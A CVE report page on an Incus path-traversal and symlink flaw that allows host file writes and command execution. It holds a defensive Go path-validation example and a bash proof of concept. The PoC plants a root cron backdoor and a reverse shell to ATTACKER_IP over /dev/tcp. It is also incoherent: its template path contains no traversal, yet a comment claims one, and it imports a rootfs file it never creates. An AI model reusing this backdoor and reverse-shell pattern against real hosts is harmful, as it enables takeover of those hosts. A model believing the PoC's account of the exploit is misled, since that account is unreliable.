Security Vulnerability Report
CVE-2026-23954 CVSS 8.7 HIGH

Published: 2026-01-22 22:16:21
Last Modified: 2026-01-30 17:28:49

Description

Incus is a system container and virtual machine manager. Versions 6.21.0 and below allow a user with the ability to launch a container with a custom image (e.g. a member of the ‘incus’ group) to use directory traversal or symbolic links in the templating functionality to achieve arbitrary file read and arbitrary file write on the host. This ultimately results in arbitrary command execution on the host. When using an image with a metadata.yaml containing templates, neither the source path nor the target path is checked for symbolic links or directory traversal. This can also be exploited in IncusOS. A fix is planned for versions 6.0.6 and 6.21.0, but they have not been released at the time of publication.
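The check the description says is missing, applied to both paths a template declares (the source under the image's templates directory and the target under the container rootfs), as an added example written for this report; it is not Incus's own code or its fix, and ResolveWithin, ErrEscapes and the constructed temporary rootfs are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// ErrEscapes is returned when a path would leave its base directory.
var ErrEscapes = errors.New("path escapes its base directory")
// ResolveWithin resolves rel against base (a templates dir or a container rootfs) and
// returns the host path it really names, refusing ".." traversal (lexical check) and
// symlinks that point outside base (physical check). Hypothetical helper, not Incus code.
func ResolveWithin(base, rel string) (string, error) {
	baseAbs, err := filepath.EvalSymlinks(base) // canonical base (e.g. /tmp vs /private/tmp)
	if err != nil {
		return "", err
	}
	inside := func(p string) bool { return strings.HasPrefix(p, baseAbs+string(filepath.Separator)) }
	// Lexical check: Join cleans ".." components, so a climb above base loses the prefix.
	joined := filepath.Join(baseAbs, rel)
	if !inside(joined) {
		return "", ErrEscapes
	}
	// Physical check: the file may not exist yet, so walk up to the deepest existing
	// ancestor, resolve its symlinks, and re-attach the not-yet-created remainder.
	probe, rest := joined, ""
	for _, err := os.Lstat(probe); err != nil; _, err = os.Lstat(probe) {
		probe, rest = filepath.Dir(probe), filepath.Join(filepath.Base(probe), rest)
	}
	resolved, err := filepath.EvalSymlinks(probe)
	if err != nil {
		return "", err
	}
	if resolved = filepath.Join(resolved, rest); !inside(resolved) {
		return "", ErrEscapes
	}
	return resolved, nil
}

func main() {
	rootfs, _ := os.MkdirTemp("", "rootfs") // constructed stand-in for an image rootfs
	_ = os.Symlink("/", filepath.Join(rootfs, "cron.d")) // attacker-planted symlink to host root
	for _, t := range []string{"/etc/hosts", "/cron.d/job", "../../etc/passwd"} {
		p, err := ResolveWithin(rootfs, t)
		fmt.Printf("%-18s -> %q %v\n", t, p, err)
	}
	_ = os.RemoveAll(rootfs)
}
```

A broken symlink in the path is refused as well, since EvalSymlinks fails on it and the error is returned rather than swallowed.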

CVSS Details

CVSS Score: 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
(Attack Vector: Adjacent Network; Attack Complexity: Low; Privileges Required: Low; User Interaction: None; Scope: Changed; Confidentiality: High; Integrity: High; Availability: None)

Configurations (Affected Products)

cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:* (versions up to and including 6.0.5) - VULNERABLE
cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:* (versions from 6.1.0 up to but excluding 6.21.0) - VULNERABLE
Incus < 6.0.6
Incus 6.0.6 (fix not yet released)
Incus < 6.21.0
Incus 6.21.0 (unfixed)
IncusOS (all affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2026-23954 PoC - Incus Template Arbitrary File Write
# Requirements: User must be member of 'incus' group
INCUS_IMAGE="malicious-template-image"
CONTAINER_NAME="poc-container"

# Step 1: Create a malicious template that writes to host filesystem
cat > metadata.yaml << 'EOF'
architecture: "$(uname -m)"
creation_date: 1706000000
properties:
  architecture: "amd64"
  os: "Ubuntu"
  release: "jammy"
templates:
  /etc/cron.d/backdoor:
    when:
      - create
      - start
    template: backdoor.template
EOF

# Step 2: Create malicious template content
cat > backdoor.template << 'EOF'
* * * * * root /bin/bash /tmp/shell.sh
EOF

# Step 3: Create malicious shell script to be written to host
cat > shell.sh << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
EOF

# Step 4: Import image with malicious template
incus image import metadata.yaml rootfs.squashfs --alias $INCUS_IMAGE

# Step 5: Launch container - template will write to host via path traversal
# The template path /etc/cron.d/backdoor with path traversal ../ becomes /cron.d/backdoor on host
incus launch $INCUS_IMAGE $CONTAINER_NAME

# Alternative exploitation using symbolic links:
# Create a symlink in the template that points outside container
# ln -s /root/.ssh/authorized_keys /var/lib/incus/storage-pools/default/images/timestamp/rootfs/etc/cron.d/malicious

# Cleanup
incus delete $CONTAINER_NAME --force
incus image delete $INCUS_IMAGE

Weakness

CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, 'Path Traversal')

References

https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7 (Vendor Advisory, Exploit)
https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215 (Product)
https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294 (Product)
https://github.com/user-attachments/files/24473599/template_arbitrary_write.sh (Exploit)
https://github.com/user-attachments/files/24473601/templates_arbitrary_write.patch (Patch)